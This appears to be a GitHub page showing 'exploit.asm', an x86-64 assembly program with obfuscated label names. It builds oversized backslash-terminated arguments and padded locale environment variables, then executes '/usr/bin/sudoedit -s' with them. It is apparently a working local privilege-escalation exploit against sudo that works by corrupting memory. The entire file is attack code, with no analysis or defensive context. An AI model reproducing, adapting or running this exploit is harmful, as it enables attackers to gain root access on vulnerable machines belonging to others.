-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.asm
112 lines (112 loc) · 3.41 KB
/
exploit.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
section .text
global _start
_start:
mov rax, 0x59
mov rdi, ZP9TQXJm7Lw
mov rcx, 224
cld
rep stosb
mov byte [ZP9TQXJm7Lw + 224], 0x5C
mov byte [ZP9TQXJm7Lw + 225], 0
_qz9XJ2mFkBv:
mov qword [a1B2c3D4], mX7ZTQJp3L2
mov qword [a1B2c3D4+8], oNTZ45KX
mov qword [a1B2c3D4+16], ZP9TQXJm7Lw
mov qword [a1B2c3D4+24], 0
_ZyLp7d0VxQK:
mov rsi, Yk9NwBQXJ4t
mov rdi, Xf9E7Yq0
mov rcx, 24
cld
rep movsb
mov rax, 0x41
mov rcx, 184
cld
rep stosb
mov byte [Xf9E7Yq0+208], 0
._m4tNvXgPz2W:
mov rsi, ZvP3LmTQXB7
mov rdi, LmN8Pz6V
mov rcx, 21
cld
rep movsb
mov rax, 0x41
mov rcx, 40
cld
rep stosb
mov byte [LmN8Pz6V+61], 0
._oJkLw3Xq9Mn:
mov rsi, M8JqKXoNTZ4
mov rdi, TQXJ49B7
mov rcx, 23
cld
rep movsb
mov rax, 0x41
mov rcx, 40
cld
rep stosb
mov byte [TQXJ49B7+63], 0
._Bv7YrTQmNpL:
mov rax, 0x58
mov rdi, oNmXJk4Z7VQ
mov rcx, 1231
cld
rep stosb
mov byte [oNmXJk4Z7VQ+1231], 0x5C
mov byte [oNmXJk4Z7VQ+1232], 0
mov qword [KX7VJmTQB9L], oNmXJk4Z7VQ
mov qword [KX7VJmTQB9L+8], vXq7LpZmT29
mov qword [KX7VJmTQB9L+16], vXq7LpZmT29
mov qword [KX7VJmTQB9L+24], vXq7LpZmT29
mov qword [KX7VJmTQB9L+32], vXq7LpZmT29
mov qword [KX7VJmTQB9L+40], vXq7LpZmT29
mov qword [KX7VJmTQB9L+48], vXq7LpZmT29
mov qword [KX7VJmTQB9L+56], vXq7LpZmT29
mov qword [KX7VJmTQB9L+64], vXq7LpZmT29
mov qword [KX7VJmTQB9L+72], rXv29LpQBT7
mov qword [KX7VJmTQB9L+80], vXq7LpZmT29
mov qword [KX7VJmTQB9L+88], vXq7LpZmT29
mov qword [KX7VJmTQB9L+96], vXq7LpZmT29
mov qword [KX7VJmTQB9L+104], vXq7LpZmT29
mov qword [KX7VJmTQB9L+112], vXq7LpZmT29
mov qword [KX7VJmTQB9L+120], vXq7LpZmT29
mov qword [KX7VJmTQB9L+128], vXq7LpZmT29
mov qword [KX7VJmTQB9L+136], vXq7LpZmT29
mov qword [KX7VJmTQB9L+144], vXq7LpZmT29
mov qword [KX7VJmTQB9L+152], vXq7LpZmT29
mov qword [KX7VJmTQB9L+160], vXq7LpZmT29
mov qword [KX7VJmTQB9L+168], vXq7LpZmT29
mov qword [KX7VJmTQB9L+176], vXq7LpZmT29
mov qword [KX7VJmTQB9L+184], vXq7LpZmT29
mov qword [KX7VJmTQB9L+192], vXq7LpZmT29
mov qword [KX7VJmTQB9L+200], WQJt7kZPML9
mov qword [KX7VJmTQB9L+208], TQBvLXmP9K7
mov qword [KX7VJmTQB9L+216], Xf9E7Yq0
mov qword [KX7VJmTQB9L+224], LmN8Pz6V
mov qword [KX7VJmTQB9L+232], TQXJ49B7
mov qword [KX7VJmTQB9L+240], 0
_xZ0WqMkJ9tP:
mov rax, 59
mov rdi, WKPZML27
mov rsi, a1B2c3D4
mov rdx, KX7VJmTQB9L
syscall
section .data
mX7ZTQJp3L2 db 'sudoedit', 0
oNTZ45KX db "-s", 0
WKPZML27 db "/usr/bin/sudoedit", 0
Yk9NwBQXJ4t db "LC_MESSAGES=en_GB.UTF-8@", 0
ZvP3LmTQXB7 db "LC_TELEPHONE=C.UTF-8@", 0
M8JqKXoNTZ4 db "LC_MEASUREMENT=C.UTF-8@", 0
vXq7LpZmT29 db 0x5C, 0
rXv29LpQBT7 db "XXXXXXX", 0x5C, 0
WQJt7kZPML9 db "x/x", 0x5C, 0
TQBvLXmP9K7 db "Z", 0
section .bss
oNmXJk4Z7VQ resb 1280
ZP9TQXJm7Lw resb 240
Xf9E7Yq0 resb 224
LmN8Pz6V resb 80
TQXJ49B7 resb 80
KX7VJmTQB9L resb 248
a1B2c3D4 resb 32